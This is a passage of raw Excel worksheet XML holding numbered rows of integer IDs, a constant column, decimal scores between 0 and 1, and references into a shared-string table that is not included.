        <v>1356</v>
      </c>
      <c r="D6203">
        <v>3</v>
      </c>
      <c r="E6203">
        <v>0.90859997272491455</v>
      </c>
      <c r="F6203" t="s">
        <v>10120</v>
      </c>
      <c r="G6203" t="s">
        <v>12271</v>
      </c>
      <c r="H6203" t="s">
        <v>12272</v>
      </c>
    </row>
    <row r="6204" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6204" s="1">
        <v>6202</v>
      </c>
      <c r="B6204">
        <v>2259</v>
      </c>
      <c r="C6204">
        <v>2259</v>
      </c>
      <c r="D6204">
        <v>3</v>
      </c>
      <c r="E6204">
        <v>0.75880002975463867</v>
      </c>
      <c r="F6204" t="s">
        <v>10120</v>
      </c>
      <c r="G6204" t="s">
        <v>12273</v>
      </c>
      <c r="H6204" t="s">
        <v>12274</v>
      </c>
    </row>
    <row r="6205" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6205" s="1">
        <v>6203</v>
      </c>
      <c r="B6205">
        <v>2261</v>
      </c>
      <c r="C6205">
        <v>2261</v>
      </c>
      <c r="D6205">
        <v>3</v>
      </c>
      <c r="E6205">
        <v>0.71480000019073486</v>
      </c>
      <c r="F6205" t="s">
        <v>10120</v>
      </c>
      <c r="G6205" t="s">
        <v>12275</v>
      </c>
      <c r="H6205" t="s">
        <v>12276</v>
      </c>
    </row>
    <row r="6206" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6206" s="1">
        <v>6204</v>
      </c>
      <c r="B6206">
        <v>1350</v>
      </c>
      <c r="C6206">
        <v>1350</v>
      </c>
      <c r="D6206">
        <v>3</v>
      </c>
      <c r="E6206">
        <v>0.58569997549057007</v>
      </c>
      <c r="F6206" t="s">
        <v>10120</v>
      </c>
      <c r="G6206" t="s">
        <v>12277</v>
      </c>
      <c r="H6206" t="s">
        <v>12278</v>
      </c>
    </row>
    <row r="6207" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6207" s="1">
        <v>6205</v>
      </c>
      <c r="B6207">
        <v>1349</v>
      </c>
      <c r="C6207">
        <v>1349</v>
      </c>
      <c r="D6207">
        <v>3</v>
      </c>
      <c r="E6207">
        <v>0.38929998874664312</v>
      </c>
      <c r="F6207" t="s">
        <v>10120</v>
      </c>
      <c r="G6207" t="s">
        <v>12279</v>
      </c>
      <c r="H6207" t="s">
        <v>12280</v>
      </c>
    </row>
    <row r="6208" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6208" s="1">
        <v>6206</v>
      </c>
      <c r="B6208">
        <v>2272</v>
      </c>
      <c r="C6208">
        <v>2272</v>
      </c>
      <c r="D6208">
        <v>3</v>
      </c>
      <c r="E6208">
        <v>0.69660001993179321</v>
      </c>
      <c r="F6208" t="s">
        <v>10120</v>
      </c>
      <c r="G6208" t="s">
        <v>12281</v>
      </c>
      <c r="H6208" t="s">
        <v>12282</v>
      </c>
    </row>
    <row r="6209" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6209" s="1">
        <v>6207</v>
      </c>
      <c r="B6209">
        <v>2276</v>
      </c>
      <c r="C6209">
        <v>2276</v>
      </c>
      <c r="D6209">
        <v>3</v>
      </c>
      <c r="E6209">
        <v>0.59259998798370361</v>
      </c>
      <c r="F6209" t="s">
        <v>10120</v>
      </c>
      <c r="G6209" t="s">
        <v>12283</v>
      </c>
      <c r="H6209" t="s">
        <v>12284</v>
      </c>
    </row>
    <row r="6210" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6210" s="1">
        <v>6208</v>
      </c>
      <c r="B6210">
        <v>1285</v>
      </c>
      <c r="C6210">
        <v>1285</v>
      </c>
      <c r="D6210">
        <v>3</v>
      </c>
      <c r="E6210">
        <v>0.67580002546310425</v>
      </c>
      <c r="F6210" t="s">
        <v>10120</v>
      </c>
      <c r="G6210" t="s">
        <v>12285</v>
      </c>
      <c r="H6210" t="s">
        <v>12286</v>
      </c>
    </row>
    <row r="6211" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6211" s="1">
        <v>6209</v>
      </c>
      <c r="B6211">
        <v>2363</v>
      </c>
      <c r="C6211">
        <v>2363</v>
      </c>
      <c r="D6211">
        <v>3</v>
      </c>
      <c r="E6211">
        <v>0.77689999341964722</v>
      </c>
      <c r="F6211" t="s">
        <v>10120</v>
      </c>
      <c r="G6211" t="s">
        <v>12287</v>
      </c>
      <c r="H6211" t="s">
        <v>12288</v>
      </c>
    </row>
    <row r="6212" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6212" s="1">
        <v>6210</v>
      </c>
      <c r="B6212">
        <v>1284</v>
      </c>
      <c r="C6212">
        <v>1284</v>
      </c>
      <c r="D6212">
        <v>3</v>
      </c>
      <c r="E6212">
        <v>0.99479997158050537</v>
      </c>
      <c r="F6212" t="s">
        <v>10120</v>
      </c>
      <c r="G6212" t="s">
        <v>12289</v>
      </c>
      <c r="H6212" t="s">
        <v>12290</v>
      </c>
    </row>
    <row r="6213" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6213" s="1">
        <v>6211</v>
      </c>
      <c r="B6213">
        <v>2449</v>
      </c>
      <c r="C6213">
        <v>2449</v>
      </c>
      <c r="D6213">
        <v>3</v>
      </c>
      <c r="E6213">
        <v>0.67940002679824829</v>
      </c>
      <c r="F6213" t="s">
        <v>10120</v>
      </c>
      <c r="G6213" t="s">
        <v>12291</v>
      </c>
      <c r="H6213" t="s">
        <v>12292</v>
      </c>
    </row>
    <row r="6214" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6214" s="1">
        <v>6212</v>
      </c>
      <c r="B6214">
        <v>2450</v>
      </c>
      <c r="C6214">
        <v>2450</v>
      </c>
      <c r="D6214">
        <v>3</v>
      </c>
      <c r="E6214">
        <v>0.67940002679824829</v>
      </c>
      <c r="F6214" t="s">
        <v>10120</v>
      </c>
      <c r="G6214" t="s">
        <v>12293</v>
      </c>
      <c r="H6214" t="s">
        <v>12292</v>
      </c>
    </row>
    <row r="6215" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6215" s="1">
        <v>6213</v>
      </c>
      <c r="B6215">
        <v>1217</v>
      </c>
      <c r="C6215">
        <v>1217</v>
      </c>
      <c r="D6215">
        <v>3</v>
      </c>
      <c r="E6215">
        <v>0.39070001244544977</v>
      </c>
      <c r="F6215" t="s">
        <v>10120</v>
      </c>
      <c r="G6215" t="s">
        <v>12294</v>
      </c>
      <c r="H6215" t="s">
        <v>12295</v>
      </c>
    </row>
    <row r="6216" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6216" s="1">
        <v>6214</v>
      </c>
      <c r="B6216">
        <v>2467</v>
      </c>
      <c r="C6216">
        <v>2467</v>
      </c>
      <c r="D6216">
        <v>3</v>
      </c>
      <c r="E6216">
        <v>0.56040000915527344</v>
      </c>
      <c r="F6216" t="s">
        <v>10120</v>
      </c>
      <c r="G6216" t="s">
        <v>12296</v>
      </c>
      <c r="H6216" t="s">
        <v>12297</v>
      </c>
    </row>
    <row r="6217" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6217" s="1">
        <v>6215</v>
      </c>
      <c r="B6217">
        <v>2469</v>
      </c>
      <c r="C6217">
        <v>2469</v>
      </c>
      <c r="D6217">
        <v>3</v>
      </c>
      <c r="E6217">
        <v>0.90689998865127563</v>
      </c>
      <c r="F6217" t="s">
        <v>10120</v>
      </c>
      <c r="G6217" t="s">
        <v>12298</v>
      </c>
      <c r="H6217" t="s">
        <v>12299</v>
      </c>
    </row>
    <row r="6218" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6218" s="1">
        <v>6216</v>
      </c>
      <c r="B6218">
        <v>2473</v>
      </c>
      <c r="C6218">
        <v>2473</v>
      </c>
      <c r="D6218">
        <v>3</v>
      </c>
      <c r="E6218">
        <v>0.42460000514984131</v>
      </c>
      <c r="F6218" t="s">
        <v>10120</v>
      </c>
      <c r="G6218" t="s">
        <v>12300</v>
      </c>
      <c r="H6218" t="s">
        <v>12301</v>
      </c>
    </row>
    <row r="6219" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6219" s="1">
        <v>6217</v>
      </c>
      <c r="B6219">
        <v>2477</v>
      </c>
      <c r="C6219">
        <v>2477</v>
      </c>
      <c r="D6219">
        <v>3</v>
      </c>
      <c r="E6219">
        <v>0.98909997940063477</v>
      </c>
      <c r="F6219" t="s">
        <v>10120</v>
      </c>
      <c r="G6219" t="s">
        <v>12302</v>
      </c>
      <c r="H6219" t="s">
        <v>12303</v>
      </c>
    </row>
    <row r="6220" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6220" s="1">
        <v>6218</v>
      </c>
      <c r="B6220">
        <v>2478</v>
      </c>
      <c r="C6220">
        <v>2478</v>
      </c>
      <c r="D6220">
        <v>3</v>
      </c>
      <c r="E6220">
        <v>0.96230000257492065</v>
      </c>
      <c r="F6220" t="s">
        <v>10120</v>
      </c>
      <c r="G6220" t="s">
        <v>12304</v>
      </c>
      <c r="H6220" t="s">
        <v>12305</v>
      </c>
    </row>
    <row r="6221" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6221" s="1">
        <v>6219</v>
      </c>
      <c r="B6221">
        <v>2480</v>
      </c>
      <c r="C6221">
        <v>2480</v>
      </c>
      <c r="D6221">
        <v>3</v>
      </c>
      <c r="E6221">
        <v>0.70870000123977661</v>
      </c>
      <c r="F6221" t="s">
        <v>10120</v>
      </c>
      <c r="G6221" t="s">
        <v>12306</v>
      </c>
      <c r="H6221" t="s">
        <v>12307</v>
      </c>
    </row>
    <row r="6222" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6222" s="1">
        <v>6220</v>
      </c>
      <c r="B6222">
        <v>2483</v>
      </c>
      <c r="C6222">
        <v>2483</v>
      </c>
      <c r="D6222">
        <v>3</v>
      </c>
      <c r="E6222">
        <v>0.57709997892379761</v>
      </c>
      <c r="F6222" t="s">
        <v>10120</v>
      </c>
      <c r="G6222" t="s">
        <v>12308</v>
      </c>
      <c r="H6222" t="s">
        <v>12309</v>
      </c>
    </row>
    <row r="6223" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6223" s="1">
        <v>6221</v>
      </c>
      <c r="B6223">
        <v>2484</v>
      </c>
      <c r="C6223">
        <v>2484</v>
      </c>
      <c r="D6223">
        <v>3</v>
      </c>
      <c r="E6223">
        <v>0.99620002508163452</v>
      </c>
      <c r="F6223" t="s">
        <v>10120</v>
      </c>
      <c r="G6223" t="s">
        <v>12310</v>
      </c>
      <c r="H6223" t="s">
        <v>12311</v>
      </c>
    </row>
    <row r="6224" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6224" s="1">
        <v>6222</v>
      </c>
      <c r="B6224">
        <v>2486</v>
      </c>
      <c r="C6224">
        <v>2486</v>
      </c>
      <c r="D6224">
        <v>3</v>
      </c>
      <c r="E6224">
        <v>0.69379997253417969</v>
      </c>
      <c r="F6224" t="s">
        <v>10120</v>
      </c>
      <c r="G6224" t="s">
        <v>12312</v>
      </c>
      <c r="H6224" t="s">
        <v>12313</v>
      </c>
    </row>
    <row r="6225" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6225" s="1">
        <v>6223</v>
      </c>
      <c r="B6225">
        <v>1216</v>
      </c>
      <c r="C6225">
        <v>1216</v>
      </c>
      <c r="D6225">
        <v>3</v>
      </c>
      <c r="E6225">
        <v>0.5997999906539917</v>
      </c>
      <c r="F6225" t="s">
        <v>10120</v>
      </c>
      <c r="G6225" t="s">
        <v>12314</v>
      </c>
      <c r="H6225" t="s">
        <v>12315</v>
      </c>
    </row>
    <row r="6226" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6226" s="1">
        <v>6224</v>
      </c>
      <c r="B6226">
        <v>2489</v>
      </c>
      <c r="C6226">
        <v>2489</v>
      </c>
      <c r="D6226">
        <v>3</v>
      </c>
      <c r="E6226">
        <v>0.5274999737739563</v>
      </c>
      <c r="F6226" t="s">
        <v>10120</v>
      </c>
      <c r="G6226" t="s">
        <v>12316</v>
      </c>
      <c r="H6226" t="s">
        <v>12317</v>
      </c>
    </row>
    <row r="6227" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6227" s="1">
        <v>6225</v>
      </c>
      <c r="B6227">
        <v>1214</v>
      </c>
      <c r="C6227">
        <v>1214</v>
      </c>
      <c r="D6227">
        <v>3</v>
      </c>
      <c r="E6227">
        <v>0.65189999341964722</v>
      </c>
      <c r="F6227" t="s">
        <v>10120</v>
      </c>
      <c r="G6227" t="s">
        <v>12318</v>
      </c>
      <c r="H6227" t="s">
        <v>12319</v>
      </c>
    </row>
    <row r="6228" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6228" s="1">
        <v>6226</v>
      </c>
      <c r="B6228">
        <v>2491</v>
      </c>
      <c r="C6228">
        <v>2491</v>
      </c>
      <c r="D6228">
        <v>3</v>
      </c>
      <c r="E6228">
        <v>0.89600002765655518</v>
      </c>
      <c r="F6228" t="s">
        <v>10120</v>
      </c>
      <c r="G6228" t="s">
        <v>12320</v>
      </c>
      <c r="H6228" t="s">
        <v>12321</v>
      </c>
    </row>
    <row r="6229" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6229" s="1">
        <v>6227</v>
      </c>
      <c r="B6229">
        <v>2493</v>
      </c>
      <c r="C6229">
        <v>2493</v>
      </c>
      <c r="D6229">
        <v>3</v>
      </c>
      <c r="E6229">
        <v>0.59839999675750732</v>
      </c>
      <c r="F6229" t="s">
        <v>10120</v>
      </c>
      <c r="G6229" t="s">
        <v>12322</v>
      </c>
      <c r="H6229" t="s">
        <v>12323</v>
      </c>
    </row>
    <row r="6230" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6230" s="1">
        <v>6228</v>
      </c>
      <c r="B6230">
        <v>1230</v>
      </c>
      <c r="C6230">
        <v>1230</v>
      </c>
      <c r="D6230">
        <v>3</v>
      </c>
      <c r="E6230">
        <v>0.39629998803138727</v>
      </c>
      <c r="F6230" t="s">
        <v>10120</v>
      </c>
      <c r="G6230" t="s">
        <v>12324</v>
      </c>
      <c r="H6230" t="s">
        <v>12325</v>
      </c>
    </row>
    <row r="6231" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6231" s="1">
        <v>6229</v>
      </c>
      <c r="B6231">
        <v>1235</v>
      </c>
      <c r="C6231">
        <v>1235</v>
      </c>
      <c r="D6231">
        <v>3</v>
      </c>
      <c r="E6231">
        <v>0.98729997873306274</v>
      </c>
      <c r="F6231" t="s">
        <v>10120</v>
      </c>
      <c r="G6231" t="s">
        <v>12326</v>
      </c>
      <c r="H6231" t="s">
        <v>12327</v>
      </c>
    </row>
    <row r="6232" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6232" s="1">
        <v>6230</v>
      </c>
      <c r="B6232">
        <v>1237</v>
      </c>
      <c r="C6232">
        <v>1237</v>
      </c>
      <c r="D6232">
        <v>3</v>
      </c>
      <c r="E6232">
        <v>0.64730000495910645</v>
      </c>
      <c r="F6232" t="s">
        <v>10120</v>
      </c>
      <c r="G6232" t="s">
        <v>12328</v>
      </c>
      <c r="H6232" t="s">
        <v>12329</v>
      </c>
    </row>
    <row r="6233" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6233" s="1">
        <v>6231</v>
      </c>
      <c r="B6233">
        <v>2445</v>
      </c>
      <c r="C6233">
        <v>2445</v>
      </c>
      <c r="D6233">
        <v>3</v>
      </c>
      <c r="E6233">
        <v>0.99889999628067017</v>
      </c>
      <c r="F6233" t="s">
        <v>10120</v>
      </c>
      <c r="G6233" t="s">
        <v>12330</v>
      </c>
      <c r="H6233" t="s">
        <v>10263</v>
      </c>
    </row>
    <row r="6234" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6234" s="1">
        <v>6232</v>
      </c>
      <c r="B6234">
        <v>2364</v>
      </c>
      <c r="C6234">
        <v>2364</v>
      </c>
      <c r="D6234">
        <v>3</v>
      </c>
      <c r="E6234">
        <v>0.48669999837875372</v>
      </c>
      <c r="F6234" t="s">
        <v>10120</v>
      </c>
      <c r="G6234" t="s">
        <v>12331</v>
      </c>
      <c r="H6234" t="s">
        <v>12332</v>
      </c>
    </row>
    <row r="6235" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6235" s="1">
        <v>6233</v>
      </c>
      <c r="B6235">
        <v>1283</v>
      </c>
      <c r="C6235">
        <v>1283</v>
      </c>
      <c r="D6235">
        <v>3</v>
      </c>
      <c r="E6235">
        <v>0.98290002346038818</v>
      </c>
      <c r="F6235" t="s">
        <v>10120</v>
      </c>
      <c r="G6235" t="s">
        <v>12333</v>
      </c>
      <c r="H6235" t="s">
        <v>12334</v>
      </c>
    </row>
    <row r="6236" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6236" s="1">
        <v>6234</v>
      </c>
      <c r="B6236">
        <v>1282</v>
      </c>
      <c r="C6236">
        <v>1282</v>
      </c>
      <c r="D6236">
        <v>3</v>
      </c>
      <c r="E6236">
        <v>0.99650001525878906</v>
      </c>
      <c r="F6236" t="s">
        <v>10120</v>
      </c>
      <c r="G6236" t="s">
        <v>12335</v>
      </c>
      <c r="H6236" t="s">
        <v>12336</v>
      </c>
    </row>
    <row r="6237" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6237" s="1">
        <v>6235</v>
      </c>
      <c r="B6237">
        <v>1280</v>
      </c>
      <c r="C6237">
        <v>1280</v>
      </c>
      <c r="D6237">
        <v>3</v>
      </c>
      <c r="E6237">
        <v>0.38260000944137568</v>
      </c>
      <c r="F6237" t="s">
        <v>10120</v>
      </c>
      <c r="G6237" t="s">
        <v>12337</v>
      </c>
      <c r="H6237" t="s">
        <v>12338</v>
      </c>
    </row>
    <row r="6238" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6238" s="1">
        <v>6236</v>
      </c>
      <c r="B6238">
        <v>1270</v>
      </c>
      <c r="C6238">
        <v>1270</v>
      </c>
      <c r="D6238">
        <v>3</v>
      </c>
      <c r="E6238">
        <v>0.41839998960495001</v>
      </c>
      <c r="F6238" t="s">
        <v>10120</v>
      </c>
      <c r="G6238" t="s">
        <v>12339</v>
      </c>
      <c r="H6238" t="s">
        <v>11869</v>
      </c>
    </row>
    <row r="6239" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6239" s="1">
        <v>6237</v>
      </c>
      <c r="B6239">
        <v>2373</v>
      </c>
      <c r="C6239">
        <v>2373</v>
      </c>
      <c r="D6239">
        <v>3</v>
      </c>
      <c r="E6239">
        <v>0.99279999732971191</v>
      </c>
      <c r="F6239" t="s">
        <v>10120</v>
      </c>
      <c r="G6239" t="s">
        <v>12340</v>
      </c>
      <c r="H6239" t="s">
        <v>12341</v>
      </c>
    </row>
    <row r="6240" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6240" s="1">
        <v>6238</v>
      </c>
      <c r="B6240">
        <v>2380</v>
      </c>
      <c r="C6240">
        <v>2380</v>
      </c>
      <c r="D6240">
        <v>3</v>
      </c>
      <c r="E6240">
        <v>0.99690002202987671</v>
      </c>
      <c r="F6240" t="s">
        <v>10120</v>
      </c>
      <c r="G6240" t="s">
        <v>12342</v>
      </c>
      <c r="H6240" t="s">
        <v>12343</v>
      </c>
    </row>
    <row r="6241" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6241" s="1">
        <v>6239</v>
      </c>
      <c r="B6241">
        <v>2410</v>
      </c>
      <c r="C6241">
        <v>2410</v>
      </c>
      <c r="D6241">
        <v>3</v>
      </c>
      <c r="E6241">
        <v>0.52079999446868896</v>
      </c>
      <c r="F6241" t="s">
        <v>10120</v>
      </c>
      <c r="G6241" t="s">
        <v>12344</v>
      </c>
      <c r="H6241" t="s">
        <v>12345</v>
      </c>
    </row>
    <row r="6242" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6242" s="1">
        <v>6240</v>
      </c>
      <c r="B6242">
        <v>1392</v>
      </c>
      <c r="C6242">
        <v>1392</v>
      </c>
      <c r="D6242">
        <v>3</v>
      </c>
      <c r="E6242">
        <v>0.76759999990463257</v>
      </c>
      <c r="F6242" t="s">
        <v>10120</v>
      </c>
      <c r="G6242" t="s">
        <v>12346</v>
      </c>
      <c r="H6242" t="s">
        <v>12347</v>
      </c>
    </row>
    <row r="6243" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6243" s="1">
        <v>6241</v>
      </c>
      <c r="B6243">
        <v>1256</v>
      </c>
      <c r="C6243">
        <v>1256</v>
      </c>
      <c r="D6243">
        <v>3</v>
      </c>
      <c r="E6243">
        <v>0.90439999103546143</v>
      </c>
      <c r="F6243" t="s">
        <v>10120</v>
      </c>
      <c r="G6243" t="s">
        <v>12348</v>
      </c>
      <c r="H6243" t="s">
        <v>12349</v>
      </c>
    </row>
    <row r="6244" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6244" s="1">
        <v>6242</v>
      </c>
      <c r="B6244">
        <v>2413</v>
      </c>
      <c r="C6244">
        <v>2413</v>
      </c>
      <c r="D6244">
        <v>3</v>
      </c>
      <c r="E6244">
        <v>0.83869999647140503</v>
      </c>
      <c r="F6244" t="s">
        <v>10120</v>
      </c>
      <c r="G6244" t="s">
        <v>12350</v>
      </c>
      <c r="H6244" t="s">
        <v>12351</v>
      </c>
    </row>
    <row r="6245" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6245" s="1">
        <v>6243</v>
      </c>
      <c r="B6245">
        <v>2416</v>
      </c>
      <c r="C6245">
        <v>2416</v>
      </c>
      <c r="D6245">
        <v>3</v>
      </c>
      <c r="E6245">
        <v>0.71929997205734253</v>
      </c>
      <c r="F6245" t="s">
        <v>10120</v>
      </c>
      <c r="G6245" t="s">
        <v>12352</v>
      </c>
      <c r="H6245" t="s">
        <v>12353</v>
      </c>
    </row>
    <row r="6246" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6246" s="1">
        <v>6244</v>
      </c>
      <c r="B6246">
        <v>1244</v>
      </c>
      <c r="C6246">
        <v>1244</v>
      </c>
      <c r="D6246">
        <v>3</v>
      </c>
      <c r="E6246">
        <v>0.57050001621246338</v>
      </c>
      <c r="F6246" t="s">
        <v>10120</v>
      </c>
      <c r="G6246" t="s">
        <v>12354</v>
      </c>
      <c r="H6246" t="s">
        <v>12355</v>
      </c>
    </row>
    <row r="6247" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6247" s="1">
        <v>6245</v>
      </c>
      <c r="B6247">
        <v>2428</v>
      </c>
      <c r="C6247">
        <v>2428</v>
      </c>
      <c r="D6247">
        <v>3</v>
      </c>
      <c r="E6247">
        <v>0.43250000476837158</v>
      </c>
      <c r="F6247" t="s">
        <v>10120</v>
      </c>
      <c r="G6247" t="s">
        <v>12356</v>
      </c>
      <c r="H6247" t="s">
        <v>12357</v>
      </c>
    </row>
    <row r="6248" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6248" s="1">
        <v>6246</v>
      </c>
      <c r="B6248">
        <v>2429</v>
      </c>
      <c r="C6248">
        <v>2429</v>
      </c>
      <c r="D6248">
        <v>3</v>
      </c>
      <c r="E6248">
        <v>0.8716999888420105</v>
      </c>
      <c r="F6248" t="s">
        <v>10120</v>
      </c>
      <c r="G6248" t="s">
        <v>12358</v>
      </c>
      <c r="H6248" t="s">
        <v>12359</v>
      </c>
    </row>
    <row r="6249" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6249" s="1">
        <v>6247</v>
      </c>
      <c r="B6249">
        <v>1243</v>
      </c>
      <c r="C6249">
        <v>1243</v>
      </c>
      <c r="D6249">
        <v>3</v>
      </c>
      <c r="E6249">
        <v>0.70340001583099365</v>
      </c>
      <c r="F6249" t="s">
        <v>10120</v>
      </c>
      <c r="G6249" t="s">
        <v>12360</v>
      </c>
      <c r="H6249" t="s">
        <v>12361</v>
      </c>
    </row>
    <row r="6250" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6250" s="1">
        <v>6248</v>
      </c>
      <c r="B6250">
        <v>1241</v>
      </c>
      <c r="C6250">
        <v>1241</v>
      </c>
      <c r="D6250">
        <v>3</v>
      </c>
      <c r="E6250">
        <v>0.73629999160766602</v>
      </c>
      <c r="F6250" t="s">
        <v>10120</v>
      </c>
      <c r="G6250" t="s">
        <v>12362</v>
      </c>
      <c r="H6250" t="s">
        <v>12363</v>
      </c>
    </row>
    <row r="6251" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6251" s="1">
        <v>6249</v>
      </c>
      <c r="B6251">
        <v>2444</v>
      </c>
      <c r="C6251">
        <v>2444</v>
      </c>
      <c r="D6251">
        <v>3</v>
      </c>
      <c r="E6251">
        <v>0.72119998931884766</v>
      </c>
      <c r="F6251" t="s">
        <v>10120</v>
      </c>
      <c r="G6251" t="s">
        <v>12364</v>
      </c>
      <c r="H6251" t="s">
        <v>12079</v>
      </c>
    </row>
    <row r="6252" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6252" s="1">
        <v>6250</v>
      </c>
      <c r="B6252">
        <v>2411</v>
      </c>
      <c r="C6252">
        <v>2411</v>
      </c>
      <c r="D6252">
        <v>3</v>
      </c>
      <c r="E6252">
        <v>0.71469998359680176</v>
      </c>
      <c r="F6252" t="s">
        <v>10120</v>
      </c>
      <c r="G6252" t="s">
        <v>12365</v>
      </c>
      <c r="H6252" t="s">
        <v>12366</v>
      </c>
    </row>
    <row r="6253" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6253" s="1">
        <v>6251</v>
      </c>
      <c r="B6253">
        <v>3964</v>
      </c>
      <c r="C6253">
        <v>3964</v>
      </c>
      <c r="D6253">
        <v>3</v>
      </c>
      <c r="E6253">
        <v>0.84409999847412109</v>
      </c>
      <c r="F6253" t="s">
        <v>10120</v>
      </c>
      <c r="G6253" t="s">
        <v>12367</v>
      </c>
      <c r="H6253" t="s">
        <v>12368</v>
      </c>
    </row>
    <row r="6254" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6254" s="1">
        <v>6252</v>
      </c>
      <c r="B6254">
        <v>3653</v>
      </c>
      <c r="C6254">
        <v>3653</v>
      </c>
      <c r="D6254">
        <v>3</v>
      </c>
      <c r="E6254">
        <v>0.60180002450942993</v>
      </c>
      <c r="F6254" t="s">
        <v>10120</v>
      </c>
      <c r="G6254" t="s">
        <v>12369</v>
      </c>
      <c r="H6254" t="s">
        <v>12370</v>
      </c>
    </row>
    <row r="6255" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6255" s="1">
        <v>6253</v>
      </c>
      <c r="B6255">
        <v>1661</v>
      </c>
      <c r="C6255">
        <v>1661</v>
      </c>
      <c r="D6255">
        <v>3</v>
      </c>
      <c r="E6255">
        <v>0.98900002241134644</v>
      </c>
      <c r="F6255" t="s">
        <v>10120</v>
      </c>
      <c r="G6255" t="s">
        <v>12371</v>
      </c>
      <c r="H6255" t="s">
        <v>12372</v>
      </c>
    </row>
    <row r="6256" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6256" s="1">
        <v>6254</v>
      </c>
      <c r="B6256">
        <v>351</v>
      </c>
      <c r="C6256">
        <v>351</v>
      </c>
      <c r="D6256">
        <v>3</v>
      </c>
      <c r="E6256">
        <v>0.72990000247955322</v>
      </c>
      <c r="F6256" t="s">
        <v>10120</v>
      </c>
      <c r="G6256" t="s">
        <v>12373</v>
      </c>
      <c r="H6256" t="s">
        <v>12374</v>
      </c>
    </row>
    <row r="6257" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6257" s="1">
        <v>6255</v>
      </c>
      <c r="B6257">
        <v>5340</v>
      </c>
      <c r="C6257">
        <v>5340</v>
      </c>
      <c r="D6257">
        <v>3</v>
      </c>
      <c r="E6257">
        <v>0.98680001497268677</v>
      </c>
      <c r="F6257" t="s">
        <v>10120</v>
      </c>
      <c r="G6257" t="s">
        <v>12375</v>
      </c>
      <c r="H6257" t="s">
        <v>12376</v>
      </c>
    </row>
    <row r="6258" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6258" s="1">
        <v>6256</v>
      </c>
      <c r="B6258">
        <v>5339</v>
      </c>
      <c r="C6258">
        <v>5339</v>
      </c>
      <c r="D6258">
        <v>3</v>
      </c>
      <c r="E6258">
        <v>0.99449998140335083</v>
      </c>
      <c r="F6258" t="s">
        <v>10120</v>
      </c>
      <c r="G6258" t="s">
        <v>12377</v>
      </c>
      <c r="H6258" t="s">
        <v>12378</v>
      </c>
    </row>
    <row r="6259" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6259" s="1">
        <v>6257</v>
      </c>
      <c r="B6259">
        <v>105</v>
      </c>
      <c r="C6259">
        <v>105</v>
      </c>
      <c r="D6259">
        <v>3</v>
      </c>
      <c r="E6259">
        <v>0.99750000238418579</v>
      </c>
      <c r="F6259" t="s">
        <v>10120</v>
      </c>
      <c r="G6259" t="s">
        <v>12379</v>
      </c>
      <c r="H6259" t="s">
        <v>12380</v>
      </c>
    </row>
    <row r="6260" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6260" s="1">
        <v>6258</v>
      </c>
      <c r="B6260">
        <v>5336</v>
      </c>
      <c r="C6260">
        <v>5336</v>
      </c>
      <c r="D6260">
        <v>3</v>
      </c>
      <c r="E6260">
        <v>0.99220001697540283</v>
      </c>
      <c r="F6260" t="s">
        <v>10120</v>
      </c>
      <c r="G6260" t="s">
        <v>12381</v>
      </c>
      <c r="H6260" t="s">
        <v>12382</v>
      </c>
    </row>
    <row r="6261" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6261" s="1">
        <v>6259</v>
      </c>
      <c r="B6261">
        <v>340</v>
      </c>
      <c r="C6261">
        <v>340</v>
      </c>
      <c r="D6261">
        <v>3</v>
      </c>
      <c r="E6261">
        <v>0.56300002336502075</v>
      </c>
      <c r="F6261" t="s">
        <v>10120</v>
      </c>
